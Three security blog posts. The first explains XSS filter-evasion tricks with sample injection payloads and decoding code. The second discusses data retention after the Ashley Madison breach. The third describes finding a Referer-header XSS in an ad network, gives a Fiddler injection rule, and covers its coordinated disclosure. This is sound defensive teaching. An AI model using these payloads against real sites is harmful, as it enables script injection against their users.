Ways you haven’t stopped my XSS, Number 3 – helped by the browser / website

Apologies for not having written one of these in a while, but I find that one of the challenges here is to not release details about vulnerable sites while they’re still vulnerable – and it can take oh, so long for web developers to get around to fixing these vulnerabilities.

And when they do, often there’s more work to be done, as the fixes are incomplete, incorrect, or occasionally worse than the original problem.

Sometimes, though, so much time passes, and the world moves on so far, that you realise nobody's looking at the vulnerable site any more – so publishing details of its flaws, without publishing its identity, should be completely safe.

Helped by the website

So, what sort of attack is actively aided by the website?

Overly-verbose error messages

My favourite “helped by the website” issues are error messages which will politely inform you how your attack failed, and occasionally what you can do to fix it.

Here’s an SQL example:

[Image: error page quoting the failing SQL statement, including the injected quote]

OK, so now I know I have a SQL statement that contains the sequence “' order by type asc, sequence desc” – that tells me quite a lot. There are two fields called “type” and “sequence”. And my single injected quote was enough to demonstrate the presence of SQL injection.

What about XSS help?

There are a few web sites out there that will help you by telling you which characters they can’t handle in their search fields:

[Image: search error message listing the special characters the site won’t accept]

Now, the question isn’t “what characters can I use to attack the site?”, but “how do I get those characters into the site?” [Usually it’s as simple as typing them into the URL instead of using the text box; sometimes it’s simply a matter of encoding.]

Over-abundance of encoding / decoding

On the subject of encoding and decoding, I generally advise developers that they should document interface contracts between modules in their code, describing what the data is, what format it’s in, and what isomorphic mapping they have used to encode the data so that it is not possible to confuse it with its surrounding delimiters or code, and so that it’s possible to get the original string back.

An isomorphism, or 1:1 (“one to one”) mapping, in data encoding terms, is a means of making sure that each output can only correspond to one possible input, and vice versa.
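As a minimal sketch of what such a contract might look like (the function names here are just for illustration), percent-encoding gives you exactly that kind of reversible, 1:1 mapping – encode exactly once on the way in, decode exactly once on the way out, and never guess:

// Contract: 'value' is raw, unencoded user text; encode it exactly once on the way in.
function encodeForQuery(value) {
    return encodeURIComponent(value);
}

// Contract: 'encoded' was encoded exactly once by encodeForQuery; decode it exactly once.
function decodeFromQuery(encoded) {
    return decodeURIComponent(encoded);
}

// Round-trips exactly, with no confusion between data and delimiters:
console.log(decodeFromQuery(encodeForQuery('50% off "sale" & more')));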

Without these contracts, you find that developers are aware that data sometimes arrives in an encoded fashion, and they will do whatever it takes to decode that data. Data arrives encoded? Decode it. Data arrives doubly-encoded? Decode it again. Heck, take the easy way out, as this section of code did:
var input, output;
// Take everything after the "?" and split it into parameters
var parms = document.location.search.substr(1).split("&");
input = parms[1];
// Keep decoding until the result stops changing
while (input != output) {
    output = input;
    input = unescape(output);
}

[That’s from memory, so I apologise if it’s a little incorrect in many, many other ways as well.]

Yes, the programmer had decided to decode the input string until he got back a string that was unchanged.

This meant that an attacker could simply provide a multiply-encoded attack sequence which gets past any filters you have, such as WAFs and the like, and which the application happily decodes for you.
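To make that concrete, here’s a sketch (my own illustration, not the site’s actual code) of how a doubly-encoded payload sails past a filter that inspects the raw request, then falls out of that decode-until-stable loop in fully weaponised form:

// The raw query string contains no "<script" for a WAF to match on...
var payload = "%253Cscript%253Eprompt()%253C%252Fscript%253E";

var input = payload, output;
while (input != output) {       // the same decode-until-stable loop as above
    output = input;
    input = unescape(output);
}

console.log(output);            // <script>prompt()</script>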

Granted, I don’t think WAFs are much good, compared to actually fixing the code, but they can give you a moment’s peace to fix code, as long as your code doesn’t do things to actively prevent the WAF from being able to help.

Multiple tiers, each decoding

This has essentially the same effect as described above. The request target for an HTTP request may be percent-encoded, and when it is, the server is required to treat it equivalently to the decoded target. This can sometimes have the effect that each server in a multi-tiered service will decode the HTTP request once, achieving the multiple-decode WAF traversal I talk about above.
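Same idea, different mechanism – a sketch (the tier names are invented for illustration): each layer performs one well-intentioned decode, and a twice-encoded payload that looked inert at the edge arrives at the application in the clear:

// What the client actually sends on the wire:
var rawFromClient  = "/search?q=%253Cscript%253Eprompt()%253C%252Fscript%253E";

var afterFrontTier = decodeURIComponent(rawFromClient);    // reverse proxy decodes once
var afterAppTier   = decodeURIComponent(afterFrontTier);   // app server decodes again

console.log(afterAppTier);   // /search?q=<script>prompt()</script>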

Spelling correction

[Image: Google search results offering a spelling correction for the attempted script injection]

OK, that’s illustrative, and it illustrates that Google doesn’t fall for this crap.

But it’s interesting how you’ll find occasionally that such a correction results in executing code.

Stopwords and notwords in searches

When finding XSS in searches, we often concentrate on failed searches – after all, in most product catalogues, there isn’t an item called “<script>prompt()</script>” – unless we put it there on a previous attack.

But often the more complex (and easily attacked) code is in the successful search results – so we want to trigger that page.

Sometimes there’s something called “script”, so we squeak that by (there’s a band called “The Script”, and very often writing on things is described as being in a “script” font), but now we have to build JavaScript with other terms that match the item on display when we find “script”. Fortunately, there’s a list of words that most search engines are trained to ignore – they are called “stopwords”. These are words that don’t impact the search at all, such as “the”, “of”, “to”, “and”, “by”, etc – words that occur in such a large number of matching items that it makes no sense to allow people to search on those words. Often colours will appear in the list of stopwords, along with generic descriptions of items in the catalogue (“shirt”, “book”, etc).

Well, “alert” is simply "and"[0]+"blue"[1]+"the"[2]+"or"[1]+"the"[0], so you can build function names quickly from stopwords. Once you have String.fromCharCode as a function object, you can create many more strings and functions more quickly. For an extreme example of this kind of “building JavaScript from minimal characters”, see this page on how to create all JavaScript from eight basic characters (none of which are alphabetical!)
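Here’s that trick spelled out as a quick browser-console sketch:

// Each quoted word is a stopword the search engine will happily ignore:
var fn = "and"[0] + "blue"[1] + "the"[2] + "or"[1] + "the"[0];   // "alert"
window[fn]("built entirely from stopwords");

// With String.fromCharCode in hand, everything else follows quickly:
var s = String["fromCharCode"];
window[s(112, 114, 111, 109, 112, 116)]("and now prompt");       // prompt(...)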

“Notwords” aren’t a thing, but they made the title seem more interesting – sometimes it’d be nice to slip in a string that isn’t a stopword and isn’t going to be found in the search results. Well, many search functions have a grammar that allows us to say things like “I’d like all your teapots except for the ones made from steel” – or more briefly, “teapot !steel”.

How does this help us execute an attack?

Well, we could just as easily search for “<script> !prompt() </script>” – valid JavaScript syntax, which means “run the prompt() function, and return the negation of its result”. Well, too late, we’ve run our prompt command (or other commands). I even had “book !<script> !prompt()// !</script>” work on one occasion.

Helped by the browser

So, now that we’ve seen some examples of the server or its application helping us to exploit an XSS, what about the browser?

Carry on parsing

One of the fun things I see a lot is servers blocking XSS by ensuring that you can’t enter a complete HTML tag except for the ones they approve of.

So, if I can’t put that closing “>” in my attack, what am I to do? Can I just leave it out?

Well, strange things happen when you do. Largely because most web pages are already littered with closing angle brackets – they’re designed to close other tags, of course, not the one you’ve put in, but there they are anyway.

So, you inject “<script>prompt()</script>” and the server refuses you. You try “<script prompt() </script” and it’s allowed, but can’t execute.

So, instead, try a single tag, like “<img src=x onerror=prompt()>” – it’s rejected, because it’s a complete tag, so just drop off the terminating angle bracket. “<img src=x onerror=prompt()” – so that the next tag doesn’t interfere, add an extra space, or an “x=”:

<img src=x onerror=prompt() x=

If that gets injected into a <p> tag, it’ll appear as this:

<p><img src=x onerror=prompt() x=</p>

How’s your browser going to interpret that? Simple – open p tag, open img tag with src=x, onerror=prompt() and some attribute called “x”, whose value is “</p”.
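You can watch the browser do exactly that from the console – a quick demonstration, not an exploit:

var doc = new DOMParser().parseFromString(
    "<p><img src=x onerror=prompt() x=</p>", "text/html");
var img = doc.querySelector("img");
console.log(img.getAttribute("onerror"));   // prompt()
console.log(img.getAttribute("x"));         // </p   – the “closing” tag became an attribute value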

If confused, close a tag automatically

Occasionally, browser heuristics and documented standards will be just as helpful to you as the presence of characters in the web page.

Can’t get a “/” character into the page? Then you can’t close a <script> tag. Well, that’s OK, because the <svg> tag can include scripts, and is documented to end at the next HTML tag that isn’t valid in SVG. So… “<svg><script>prompt()<p>” will happily execute as if you’d provided the complete “<svg><script>prompt()</script></svg><p>”
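You can see the parser doing that repair work for you (DOMParser builds the tree without executing the script, which makes it a safe way to look):

var doc = new DOMParser().parseFromString("<svg><script>prompt()<p>hello", "text/html");
console.log(doc.querySelector("svg script").textContent);   // prompt()
console.log(doc.querySelector("p").textContent);            // hello – the <p> closed the script and svg for us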

There are many other examples where the browser will use some form of heuristic to “guess” what you meant, or rather to guess what the server meant with the code it sends to the browser with your injected data. See what happens when you leave your attack half-closed.

Can’t comment with // ? Try other comments

When injecting script, you often want to comment the remaining line after your injection, so it isn’t parsed – a failing parse results in none of your injected code being executed.

So, you try to inject “//” to make the rest of the line a comment. Too bad, all “/” characters are encoded or discarded.

Well, did you know that JavaScript in HTML treats “<!--” as a perfectly valid equivalent?
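It does – in classic (non-module) scripts, the HTML-style comment opener starts a single-line comment, so this runs without a syntax error:

var secret = "safe so far"; <!-- everything after the arrow on this line is ignored, just like //
alert("this line still runs");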

Different browsers help in different ways

Try attacks in different browsers; they each behave in subtly different ways.

Firefox doesn’t have an XSS filter. So it won’t prevent XSS attacks that way.

IE 11 doesn’t encode URI elements, so your attack will sometimes work there when it would otherwise arrive encoded.

Chrome – well, I don’t use Chrome often enough to comment on its quirks. Too irritated with it trying to install on my system through Adobe Flash updates.

Well, I think that’s enough for now.

Why didn’t you delete my data?

The recent hack of Ashley Madison, and the subsequent discussion, reminded me of something I’ve been meaning to talk about for some time.

Can a web site ever truly delete your data?

This is usually expressed, as my title suggests, by a user asking the web site who hosted that user’s account (and usually directly as a result of a data breach) why that web site still had the user’s data.

This can be because the user deliberately deleted their account, or simply because they haven’t used the service in a long time, and only remembered that they did by virtue of a breach notification letter (or a web site such as Troy Hunt’s haveibeenpwned.com).

1. Is there a ‘delete’ feature?

Web sites do not see it as a good idea to have a ‘delete’ feature for their user accounts – after all, what you’re asking is for a site to devote developer resources to a feature that specifically curtails the ability of that web site to continue to make money from the user.

To an accountant’s eye (or a shareholder’s), that’s money out the door with the prospect of reducing money coming in.

To a user’s eye, it’s a matter of security and trust. If the developer deliberately misses a known part of the user’s lifecycle (sunset and deprecation are both terms developers should be familiar with), it’s fairly clear that there are other things likely to be missing or skimped on. If a site allows users to disconnect themselves, to close their accounts, there’s a paradox that says more users will choose to continue their service, because they don’t feel trapped.

So, let’s assume there is a “delete” or “close my account” feature – and that it’s easy to use and functional.

2. Is there a ‘whoops’ feature for the delete?

In the aftermath of the Ashley Madison hack, I’m sure there are going to be a few partners who will engage in retributive behaviours. Those behaviours could include connecting to any accounts that the partners have shared, and causing them to be closed, deleted and destroyed as much as possible. It’s the digital equivalent of cutting the sleeves off the cheating partner’s suit jackets. Probably.

Assuming you’ve finally settled down and broken/made up, you’ll want those accounts back under your control.

So there might need to be a feature to allow for ‘remorse’ over the deletion of an account. Maybe not for the jealous partner reason, even, but perhaps just because you forgot about a service you were making use of by that account, and which you want to resurrect.

OK, so many sites have a ‘resurrect’ function, or a ‘cool-down’ period before actually terminating an account.

Facebook, for instance, will not delete your account until you’ve been inactive for 30 days.

3. Warrants to search your history

Let’s say you’re a terrorist. Or a violent criminal, or a drug baron, or simply someone who needs to be sued for slanderous / libelous statements made online.

OK, in this case, you don’t WANT the server to keep your history – but to satisfy warrants of this sort, a lawyer is likely to tell the server’s operators that they have to keep history for a specific period of time before discarding it. This allows for court orders and the like to be executed against the server to enforce the rule of law.

So your server probably has to hold onto that data for more than the 30 day inactive period. Local laws are going to put some kind of statute on how long a service provider has to hold onto your data.

As an example, a retention notice served under the UK’s rather steep RIPA law could say the service provider has to hold on to some types of data for as much as 12 months after the data is created.

4. Financial and Business records

If you’ve paid for the service being provided, those transaction details have to be held for possible accounting audits for the next several years (in the US, between 3 and 7 years, depending on the nature of the business, last time I checked).

Obviously, you’re not going to expect an audit to go into complete investigations of all your individual service requests – unless you’re billed to that level. Still, this record is going to consist of personal details of every user in the system, amounts paid, service levels given, a la carte services charged for, and some kind of demonstration that service was indeed provided.

So, even if Ashley Madison, or whoever, provided a “full delete” service, there’s a record that they have to keep somewhere that says you paid them for a service at some time in the past.

Eternal data retention – is it inevitable?

I don’t think eternal data retention is appropriate or desirable. It’s important for developers to know data retention periods ahead of time, and to build them into the tools and services they provide.

Data retention shouldn’t be online

Hackers fetch data from online services. Data kept truly offline is fundamentally impossible to steal over the network. An attacker would have to find the facility where it’s stored, or the truck the tapes/drives are travelling in, and steal the data physically.

Not that that’s impossible, but it’s a different proposition from guessing someone’s password and logging into their servers to steal data.

Once data is no longer required for online use, and can be stored, move it into a queue for offline archiving. Developers should make sure their archivist has a data destruction policy in place as well, to get rid of data that’s just too old to be of use. Occasionally (once a year, perhaps), they should practice a data recovery, just to make sure that they can do so when the auditors turn up. But they should also make sure that they have safeguards in place to prevent/limit illicit viewing / use of personal data while checking these backups.

Not everything has to be retained

Different classifications of data have different retention periods, something I alluded to above. Financial records are at the top end with seven years or so, and the minutiae of day-to-day conversations can probably be deleted remarkably quickly. Some services actually hype that as a value of the service itself, promising the messages will vanish in a snap, or like a ghost.

When developing a service, you should consider how you’re going to classify data so that you know what to keep and what to delete, and under what circumstances. You may need a lawyer to help with that.

Managing your data makes service easier

If you lay the frameworks in place when developing a service, so that data is classified and has a documented lifecycle, your service naturally becomes more loosely coupled. This makes it smoother to implement, easier to change, and more compartmentalised. This helps speed future development.

Providing user lifecycle engenders trust and loyalty

Users who know they can quit are more likely to remain loyal (Apple aside). If a user feels hemmed in and locked in place, all that’s required is for someone to offer them a reason to change, and they’ll do so. Often your own staff will provide the reason to change, because if you’re working hard to keep customers by locking them in, it demonstrates that you don’t feel like your customers like your service enough to stay on their own.

So, be careful who you give data to

Yeah, I know, “to whom you give data”, thanks, grammar pedants.

Remember some basic rules here:

1. Data wants to be free

Yeah, and Richard Stallman’s windows want to be broken.

Data doesn’t want anything, but the appearance is that it does, because when data is disseminated, it essentially cannot be returned. Just like if you go to RMS’s house and break all his windows, you can’t then put the glass fragments back into the frames.

Developers want to possess and collect data – it’s an innate passion, it seems. So if you give data to a developer (or the developer’s proxy, any application they’ve developed), you can’t actually get it back – in the sense that you can’t tell if the developer no longer has it.

2. Sometimes developers are evil – or just naughty

Occasionally developers will collect and keep data that they know they shouldn’t. Sometimes they’ll go and see which famous celebrities used their service recently, or their ex-partners, or their ‘friends’ and acquaintances.

3. Outside of the EU, your data doesn’t belong to you

EU data protection laws start from the basic assumption that factual data describing a person is essentially the non-transferrable property of the person it describes. It can be held for that person by a data custodian, a business with whom the person has a business relationship, or which has a legal right or requirement to that data. But because the data belongs to the person, that person can ask what data is held about them, and can insist on corrections to factual mistakes.

The US, and many other countries, start from the premise that whoever has collected data about a person actually owns that data, or at least that copy of the data. As a result, there’s less emphasis on openness about what data is held about you, and less access to information about yourself.

Ideally, when the revolution comes and we have a socialist government (or something in that direction), the US will pick up this idea and make it clear that service providers are providing a service and acting only as a custodian of data about their customers.

Until then, remember that US citizens have no right to discover who’s holding their data, how wrong it might be, or to ask for it to be corrected.

4. No one can leak data that you don’t give them

Developers should also think about this – you can’t leak data you don’t hold. Similarly, if a user doesn’t give you data, or gives incorrect or valueless data, then whatever leaks is fundamentally worthless.

The fallout from the Ashley Madison leak is probably reduced significantly by the number of pseudonyms and fake names in use. Probably.

Hey, if you used your real name on a cheating web site, that’s hardly smart. But then, as I said earlier today, sometimes security is about protecting bad people from bad things happening to them.

5. Even pseudonyms have value

You might use the same nickname at several places; you might provide information that’s similar to your real information; you might link multiple pseudonymous accounts together. If your data leaks, can you afford to ‘burn’ the identity attached to the pseudonym?

If you have a long message history, you have almost certainly identified yourself pretty firmly in your pseudonymous posts, by spelling patterns, word usages, etc.

Leaks of pseudonymous data are less problematic than leaks of eponymous data, but they still have their problems. Unless you’re really good at OpSec.

Finally

Finally, I was disappointed earlier tonight to see that Troy had already covered some aspects of this topic in his weekly series at Windows IT Pro, but I think you’ll see that his thoughts are from a different direction than mine.

Hack Your Friends Next

My buddy Troy Hunt has a popular PluralSight training class called “Hack Yourself First”. This is excellent advice, as it addresses multiple ideas:

  • You have your own permission to hack your own site, which means you aren’t getting into trouble
  • Before looking outward, you get to see how good your own security is
  • Hacking yourself makes it less likely that when you open up to the Internet, you’ll get pwned
  • By trying a few attacks, you’ll get to see what things an attacker might try and how to fend them off

Plenty of other reasons, I’m sure. Maybe I should watch his training.

Every now and again, though, I’ll hack my friends as well. There are a few reasons for this, too:

  • I know enough not to actually break a site – this is important
  • My friends will generally rather hear from me than an attacker that they have an obvious flaw
  • Tools that I use to find vulnerabilities sometimes stay enabled in the background
  • It’s funny

Such is the way with my recent visit to troyhunt.com – I’ve been researching reflected XSS issues caused by including script in the Referrer header.

What’s the Referrer header?

Actually, there are two places that hold the referrer, and it’s important to know the difference between them, because they get attacked in different ways, and attacks can be simulated in different ways.

The Referrer header (actually misspelled as “Referer”) is an HTTP header that the browser sends as part of its request for a new web page. The Referrer header contains a URL to the old page that the browser had loaded and which triggered the browser to fetch the new page.

There are many rules as to when this Referrer header can, and can’t, be sent. It can’t be sent if the user typed a URL. It can’t be sent if the target is HTTP, but the source was HTTPS. But there are still enough places it can be sent that the contents of the Referer header are a source of significant security concern – and why you shouldn’t EVER put sensitive data in the URL or query parameters, even when sending to an HTTPS destination. Even when RESTful.

Forging the Referer when attacking a site is a simple matter of opening up Fiddler (or your other favourite scriptable proxy) and adding a new automatic rule to your CustomRules.js, something like this:

// AMJ – this goes inside the OnBeforeRequest handler in CustomRules.js
if (oSession.oRequest.headers.Exists("Referer")) {
    // Append the probe to whatever Referer the browser already sent
    if (oSession.oRequest.headers["Referer"].Contains("?"))
        oSession.oRequest.headers["Referer"] += "&\"-prompt()-\"";
    else
        oSession.oRequest.headers["Referer"] += "?\"-prompt()-\"";
}
else {
    // No Referer at all? Supply one that carries the probe
    oSession.oRequest.headers["Referer"] = "http://www.example.com?\"-prompt()-\"";
}

Something like this code was in place when I visited other recently reported vulnerable sites, but Troy’s I hit manually. Because fun.

JavaScript’s document.referrer

The other referrer is in JavaScript: the document.referrer field. I couldn’t find any rules about when this is, or isn’t, available. That suggests it’s available for use even in cases where the HTTP Referer header wouldn’t be sent, at least in some browser or other.

Forging this is harder, and I’m not going to delve into it. I want you to know about it in case you’ve used the Referer header, and referrer-vulnerable code isn’t triggering. Avoids tearing your hair out.

Back to the discovery

So, lately I’ve been testing sites with a URL ending in the magic string ?"-prompt()-" – and happened to try it at Troy’s site, among others.

I’d seen a pattern of adsafeprotected.com advertising being vulnerable to this issue. [It’s not the only one by any means, but it’s perhaps the most prevalent.] It’s difficult to reproduce this issue accurately, because advertising mediators will send you to different advertisers each time you visit a site.

And so it was with great surprise that I tried this on Troy’s site and got an immediate hit. Partly because I know Troy will have already tried this on his own site.

Through a URL parameter, I’m injecting script into a hosted component that unwisely includes the Referer header’s contents in its JavaScript without encoding and/or quoting it first.
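To illustrate the shape of the flaw (this is my reconstruction of the pattern, not Integral Ads’ actual code): the ad script ends up emitting the referring URL inside a JavaScript string literal, so a Referer ending in ?"-prompt()-" closes the string and becomes live code:

// What effectively gets generated when the Referer is http://example.com/page?"-prompt()-"
var referringPage = "http://example.com/page?"-prompt()-"";
// The quotes in the payload terminate the string early; prompt() then runs as part of
// the resulting (meaningless, but syntactically valid) subtraction expression.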

It’s ONLY Reflected XSS

I hear that one all the time – no big deal, it’s only a reflected XSS, the most you can do with this is to abuse yourself.

Kind of, yeah. Here’s some of my reasons why Reflected XSS is important:

  • It’s an obvious flaw – it suggests your code is weak all over
  • It’s easy to fix – if you don’t fix the easy flaws, do you want me to believe you fix the hard ones?
  • An attacker can send a link to your trusted web site in a spam email, and have thousands of your users clicking on it and being exploited
  • It’s like you’ve hired a new developer on your web site – the good news is, you don’t have to pay them. The bad news is, they don’t turn up to design meetings, and may have completely different ideas about how your web site should work
  • The attacker can change content as displayed to your users without you knowing what changes are made
  • The attacker can redirect your users to other malicious websites, or to your competitors
  • The attacker can perform network scans of your users’ systems
  • The attacker can run keylogging – capturing your users’ username and password, for instance
  • The attacker can communicate with your users – with your users thinking it’s you
  • A reflected XSS can often become stored XSS, because you allow users of your forums / reviews / etc to post links to your site “because they’re safe, trusted links”
  • Once an attacker convinces one of your staff to visit the reflected XSS, the attack becomes internal. Your staff will treat the link as “trusted” and “safe”
  • Any XSS will tend to trump your XSRF protections.

So, for multiple values of “self” outside the attacker, you can abuse yourself with Reflected XSS.

Contacting the vendor and resolving

With all security research, there comes a time when you want to make use of your findings, whether to garner yourself more publicity, or to earn a paycheck, or simply to notify the vendor and have them fix something. I prefer the latter, when it’s possible / easy.

Usually, the key is to find an email address at the vulnerable domain – but security@adsafeprotected.com wasn’t working, and I couldn’t find any hints of an actual web site at adsafeprotected.com for me to go look at.

Troy was able to start from the other direction – as the owner of a site showing these adverts, he contacted the advertising agent that puts ads onto his site, and got them to fix the issue.

“Developer Media” was the name of the group, and their guy Chris quickly got onto the issue, as did Jamie from Integral Ads, the owners of adsafeprotected.com. Developer Media pulled adsafeprotected as a source of ads, and Integral Ads fixed their code.

Sites that were previously vulnerable are now not vulnerable – at least not through that exact attack.

I count that as a win.

There’s more to learn here

Finally, some learning.

1. Reputational risk / impact

Your partners can bring you as much risk as your own developers and your own code. You may be able to transfer risk to them, but you can’t transfer reputational risk as easily. With different notifications, Troy’s brand could have been substantially damaged, as could Developer Media’s and Integral Ads’. As it is, they all responded quickly, quietly and appropriately, reducing the reputational impact.

[As for my own reputational impact – you’re reading this blog entry, so that’s a positive.]

2. Good guy / bad guy hackers

This issue was easy to find. So it’s probably been in use for a while by the bad guys. There are issues like this at multiple other sites, not related to adsafeprotected.

So you should test your site and see if it’s vulnerable to this, or similar, code. If you don’t feel like you’ll do a good job, employ a penetration tester or two.

3. Reducing risk by being paranoid (iframe protection)

There’s a thin line between “paranoia” and “good security practice”. Troy’s blog uses good security practice, by ensuring that all adverts are inside an iframe, where they can’t execute in Troy’s security context. While I could redirect his users, perhaps to a malicious or competing site, I wasn’t able to read his users’ cookies, or modify content on his blog.

There were many other hosts using adsafeprotected without being in an iframe.

Make it a policy that all externally hosted content (beyond images) is required to be inside of an iframe. This acts like a firewall between your partners and you.

4. Make yourself findable

If you’re a developer, you need to have a security contact, and that contact must be findable from any angle of approach. Security researchers will not spend much time looking for your contact information.

Ideally, for each domain you handle, have the address security@example.com (where you replace “example.com” with your domain) point to a monitored email address. This will be the FIRST thing a security researcher will try when contacting you. Finding the “Contact Us” link on your web page and filling out a form is farther down on the list of things a researcher will do. Such a researcher usually has multiple findings they’re working on, and they’ll move on to notifying someone else rather than spend time looking for how to notify you.

5. Don’t use “safe”, “secure”, “protected” etc in your domain name

This just makes it more ironic when the inevitable vulnerability is found.

6. Vulns protected by XSS Filter are still vulns

As Troy notes, I did have to disable the XSS Filter in order to see this vuln happen.

That doesn’t make the vuln any less important to fix – all it means is that to exploit it, I have to find customers who have also disabled the XSS Filter, or find a way to evade the filter.

There are many sites advising users how to disable the XSS Filter, for various (mostly specious) reasons, and there are new ways every day to evade the filter.

7. Ad security is HARD

The web ad industry is at a crisis point, from my perspective.

Flash has what appear to be daily vulnerabilities, and yet it’s still seen to be the medium of choice for online advertising.

Even without vulnerabilities in Flash, its programmability lends it to being used by bad guys to distribute malicious software. There are logic-based and time-based exploits (display a ‘good’ ad when inspected by the ad hosting provider; display a bad ad, or do something malicious when displayed on customers’ computers) which attackers will use to ensure that their ad passes rigorous inspection, but still deploys bad code to end users.

Any ad that uses JavaScript is susceptible to common vulnerability methods.

Ad blockers are being run by more and more people – even institutions (one college got back 40% of their network bandwidth by employing ad blocking).

Web sites need to be funded. If you’re not paying for the content, someone is. How is that to be done except through advertising? [Maybe you have a good idea that hasn’t been tried yet]

8. Timing of bug reports is a challenge

I’ll admit, I was bored when I found the bug on Troy’s site on a weekend. I decided to contact him straight away, and he responded immediately.

This led to Developer Media being contacted late on a Sunday.

This is not exactly friendly of me and Troy – but at least we didn’t publish, and left it to the developers to decide whether to treat this as a “fire drill”.

A good reason, indeed, to use responsible / coordinated disclosure, and make sure that you don’t publish until teams are actively working on / have resolved the problem.

9. Some browsers are safer – that doesn’t mean your web site is safe

There are people using old and poorly configured browsers everywhere. Perhaps they make up 0.1% of your users. If you have 100,000 users, that’s a hundred people who will be affected by issues with those browsers.

Firefox escaped because it encoded the quote characters to %22, and the server at adsafeprotected didn’t decode them. Technically, adsafeprotected’s server is not RFC compliant because of this, so Firefox isn’t really protecting anyone here – it’s the server’s failure to decode that happens to block the attack.

Chrome escaped because it encoded the quote characters AND has an XSS filter to block things like my attack. This is not 100% safe, and can be disabled easily by the user.

Internet Explorer up to version 11 escaped if you leave the XSS Filter turned on.

Microsoft Edge in Windows 10 escaped because it encodes the quote characters and has a robust XSS Filter that, as far as I can tell, you can’t turn off.

All these XSS filters can be turned off by setting a header (X-XSS-Protection: 0) in network traffic.

Nobody would do that.

Until such time as one of these browsers has a significant flaw in their XSS filter.

So, don’t rely on the XSS Filter to protect you – it can’t be complete, and it may wind up being disabled.